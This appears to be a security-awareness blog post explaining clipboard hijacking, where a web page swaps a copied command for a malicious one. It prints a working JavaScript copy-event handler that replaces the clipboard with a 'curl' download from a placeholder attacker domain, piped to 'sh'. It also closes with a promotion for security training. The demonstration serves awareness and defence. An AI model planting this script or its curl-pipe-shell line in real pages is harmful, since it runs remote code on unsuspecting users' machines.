This is why you should NEVER copy paste commands directly into your terminal. Ask any developer or Admin if they have ever copied a command line or code snippet from the web. The answer would probably be YES. You would assume that what you copied is what you paste, right? Well, nope!
You think you are copying one thing, but it’s replaced with something else, like malicious code. All it takes is a single line of code injected into the code you copied to create a backdoor to your app.
How It Works
This attack is very simple but also very harmful. Here is how it works:
Thank you to Harel Friedlander for recording this video.
Let’s say you were searching how to update your ubuntu, and you found this command line. And you copy it:
Try it - copy the command below:
sudo apt update
Now Paste it here:
Here is the issue: Did you see that it automatically added a new line. When this happens in a terminal it will automatically execute the command!
This is the javascript that is responsible for this:
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault(); });
</script>
how to avoid this?
The safest way is not to paste anything you copied from the web into your terminal. Also, many terminals can be configured not to automatically execute when you paste a "\n" (new line)
But wait, there's more…
This was just one example of why awareness is essential in avoiding getting hacked. We have MANY Security Awareness Training videos to help train your dev team about OWASP 10 and code with security in mind. It's not limited to developers and admins, though, we also have training for your entire team.
Learn more about our Free security awareness training.
